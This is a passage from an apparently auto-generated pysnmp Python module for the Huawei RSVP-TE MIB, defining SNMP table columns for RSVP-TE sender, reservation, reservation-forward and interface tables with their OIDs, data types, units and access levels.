hwRsvpTeSenderMsgIdSndEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 42), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndEpoch.setStatus('current')
hwRsvpTeSenderMsgIdSndNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 43), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdSndNumber.setStatus('current')
hwRsvpTeSenderMsgIdRcvFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 44), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvFlag.setStatus('current')
hwRsvpTeSenderMsgIdRcvEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 45), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvEpoch.setStatus('current')
hwRsvpTeSenderMsgIdRcvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 46), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderMsgIdRcvNumber.setStatus('current')
hwRsvpTeSenderClassType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 47), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderClassType.setStatus('current')
hwRsvpTeSenderLabelRequestCtype = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 48), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("withoutLabelRange", 1), ("withAtmLabelRange", 2), ("withFrameRelayLabelRange", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestCtype.setStatus('current')
hwRsvpTeSenderLabelRequestL3pid = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 49), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestL3pid.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 50), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMinVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 51), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMinVci.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVpi = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 52), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVpi.setStatus('current')
hwRsvpTeSenderLabelRequestAtmMaxVci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 53), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestAtmMaxVci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMinDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 54), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMinDlci.setStatus('current')
hwRsvpTeSenderLabelRequestFrMaxDlci = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 55), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderLabelRequestFrMaxDlci.setStatus('current')
hwRsvpTeSenderSessionAttrType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 56), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 7))).clone(namedValues=NamedValues(("withRa", 1), ("withoutRa", 7)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrType.setStatus('current')
hwRsvpTeSenderSessionAttrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 57), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrSetupPrio.setStatus('current')
hwRsvpTeSenderSessionAttrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 58), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrHoldPrio.setStatus('current')
hwRsvpTeSenderSessionAttrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 59), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrFlag.setStatus('current')
hwRsvpTeSenderSessionAttrName = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 60), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 64))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrName.setStatus('current')
hwRsvpTeSenderSessionAttrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 61), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrExcludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 62), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAny.setStatus('current')
hwRsvpTeSenderSessionAttrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 63), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderSessionAttrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrSetupPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 64), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrSetupPrio.setStatus('current')
hwRsvpTeSenderFrrHoldPrio = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 65), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHoldPrio.setStatus('current')
hwRsvpTeSenderFrrHopLimit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 66), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrHopLimit.setStatus('current')
hwRsvpTeSenderFrrFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 67), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("oneToOneDesired", 1), ("facilityDesired", 2), ("noBackupDesired", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrFlag.setStatus('current')
hwRsvpTeSenderFrrBandwidth = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 68), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrBandwidth.setStatus('current')
hwRsvpTeSenderFrrExcludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 69), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrExcludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAny = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 70), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAny.setStatus('current')
hwRsvpTeSenderFrrIncludeAll = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 71), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrIncludeAll.setStatus('current')
hwRsvpTeSenderFrrInuseFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 72), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5))).clone(namedValues=NamedValues(("normal", 1), ("plrInUse", 2), ("mpInUse", 3), ("plrAndMpInUse", 4), ("underProtection", 5)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderFrrInuseFlag.setStatus('current')
hwRsvpTeSenderDiffServPsc = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 2, 1, 73), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeSenderDiffServPsc.setStatus('current')
hwRsvpTeResvTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3), )
if mibBuilder.loadTexts: hwRsvpTeResvTable.setStatus('current')
hwRsvpTeResvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvEntry.setStatus('current')
hwRsvpTeResvNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvNumber.setStatus('current')
hwRsvpTeResvType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvType.setStatus('current')
hwRsvpTeResvDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddr.setStatus('current')
hwRsvpTeResvSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddr.setStatus('current')
hwRsvpTeResvDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvDestAddrLength.setStatus('current')
hwRsvpTeResvSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvSenderAddrLength.setStatus('current')
hwRsvpTeResvHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopAddr.setStatus('current')
hwRsvpTeResvHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvHopLih.setStatus('current')
hwRsvpTeResvInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterface.setStatus('current')
hwRsvpTeResvService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvService.setStatus('current')
hwRsvpTeResvTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecRate.setStatus('current')
hwRsvpTeResvTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecPeakRate.setStatus('current')
hwRsvpTeResvTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecBurst.setStatus('current')
hwRsvpTeResvTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMinTu.setStatus('current')
hwRsvpTeResvTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTSpecMaxTu.setStatus('current')
hwRsvpTeResvRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 16), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecRate.setStatus('current')
hwRsvpTeResvRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRSpecSlack.setStatus('current')
hwRsvpTeResvInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvInterval.setStatus('current')
hwRsvpTeResvScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvScope.setStatus('current')
hwRsvpTeResvShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvShared.setStatus('current')
hwRsvpTeResvExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvExplicit.setStatus('current')
hwRsvpTeResvRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvRsvpHop.setStatus('current')
hwRsvpTeResvPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvPolicy.setStatus('current')
hwRsvpTeResvTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvTtl.setStatus('current')
hwRsvpTeResvConfirm = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 3, 1, 25), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvConfirm.setStatus('current')
hwRsvpTeResvFwdTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4), )
if mibBuilder.loadTexts: hwRsvpTeResvFwdTable.setStatus('current')
hwRsvpTeResvFwdEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1), ).setIndexNames((0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeSessionNumber"), (0, "HUAWEI-RSVPTE-MIB", "hwRsvpTeResvFwdNumber"))
if mibBuilder.loadTexts: hwRsvpTeResvFwdEntry.setStatus('current')
hwRsvpTeResvFwdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 1), Gauge32())
if mibBuilder.loadTexts: hwRsvpTeResvFwdNumber.setStatus('current')
hwRsvpTeResvFwdType = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 2), SessionType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdType.setStatus('current')
hwRsvpTeResvFwdDestAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddr.setStatus('current')
hwRsvpTeResvFwdSenderAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 4), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddr.setStatus('current')
hwRsvpTeResvFwdDestAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdDestAddrLength.setStatus('current')
hwRsvpTeResvFwdSenderAddrLength = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdSenderAddrLength.setStatus('current')
hwRsvpTeResvFwdHopAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 7), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopAddr.setStatus('current')
hwRsvpTeResvFwdHopLih = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 8), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdHopLih.setStatus('current')
hwRsvpTeResvFwdInterface = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 9), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterface.setStatus('current')
hwRsvpTeResvFwdService = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 10), QosService()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdService.setStatus('current')
hwRsvpTeResvFwdTSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 11), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecRate.setStatus('current')
hwRsvpTeResvFwdTSpecPeakRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 12), BitRate()).setUnits('bits per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecPeakRate.setStatus('current')
hwRsvpTeResvFwdTSpecBurst = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 13), BurstSize()).setUnits('bytes').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecBurst.setStatus('current')
hwRsvpTeResvFwdTSpecMinTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 14), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMinTu.setStatus('current')
hwRsvpTeResvFwdTSpecMaxTu = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 15), MessageSize()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTSpecMaxTu.setStatus('current')
hwRsvpTeResvFwdRSpecRate = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 16), BitRate()).setUnits('bytes per second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecRate.setStatus('current')
hwRsvpTeResvFwdRSpecSlack = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 17), Integer32()).setUnits('microseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRSpecSlack.setStatus('current')
hwRsvpTeResvFwdInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 18), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdInterval.setStatus('current')
hwRsvpTeResvFwdScope = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 19), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdScope.setStatus('current')
hwRsvpTeResvFwdShared = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 20), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdShared.setStatus('current')
hwRsvpTeResvFwdExplicit = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 21), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdExplicit.setStatus('current')
hwRsvpTeResvFwdRsvpHop = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 22), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdRsvpHop.setStatus('current')
hwRsvpTeResvFwdPolicy = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 23), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdPolicy.setStatus('current')
hwRsvpTeResvFwdTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 24), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdTtl.setStatus('current')
hwRsvpTeResvFwdMsgIdFlag = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 25), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdFlag.setStatus('current')
hwRsvpTeResvFwdMsgIdEpoch = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 26), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdEpoch.setStatus('current')
hwRsvpTeResvFwdMsgIdNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 4, 1, 27), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeResvFwdMsgIdNumber.setStatus('current')
hwRsvpTeIfTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5), )
if mibBuilder.loadTexts: hwRsvpTeIfTable.setStatus('current')
hwRsvpTeIfEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1), ).setIndexNames((0, "IF-MIB", "ifIndex"))
if mibBuilder.loadTexts: hwRsvpTeIfEntry.setStatus('current')
hwRsvpTeIfUdpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 1), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpNbrs.setStatus('current')
hwRsvpTeIfIpNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 2), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfIpNbrs.setStatus('current')
hwRsvpTeIfNbrs = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfNbrs.setStatus('current')
hwRsvpTeIfRefreshBlockadeMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 4), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshBlockadeMultiple.setStatus('current')
hwRsvpTeIfRefreshMultiple = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 5), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshMultiple.setStatus('current')
hwRsvpTeIfTtl = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 6), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfTtl.setStatus('current')
hwRsvpTeIfRefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 7), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRefreshInterval.setStatus('current')
hwRsvpTeIfRouteDelay = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 8), TimeInterval()).setUnits('hundredths of a second').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRouteDelay.setStatus('current')
hwRsvpTeIfEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 9), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfEnabled.setStatus('current')
hwRsvpTeIfUdpRequired = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfUdpRequired.setStatus('current')
hwRsvpTeIfStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 11), RowStatus()).setMaxAccess("readcreate")
if mibBuilder.loadTexts: hwRsvpTeIfStatus.setStatus('current')
hwRsvpTeIfHelloEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfHelloEnabled.setStatus('current')
hwRsvpTeIfSrefreshEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 13), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshEnabled.setStatus('current')
hwRsvpTeIfSrefreshInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 14), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfSrefreshInterval.setStatus('current')
hwRsvpTeIfRetranIncDelta = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 15), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranIncDelta.setStatus('current')
hwRsvpTeIfRetranInterval = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 16), TimeInterval()).setUnits('milliseconds').setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfRetranInterval.setStatus('current')
hwRsvpTeIfAuthEnabled = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 17), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEnabled.setStatus('current')
hwRsvpTeIfAuthEncrypted = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 18), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthEncrypted.setStatus('current')
hwRsvpTeIfAuthHandshake = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 148, 1, 5, 1, 19), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwRsvpTeIfAuthHandshake.setStatus('current')
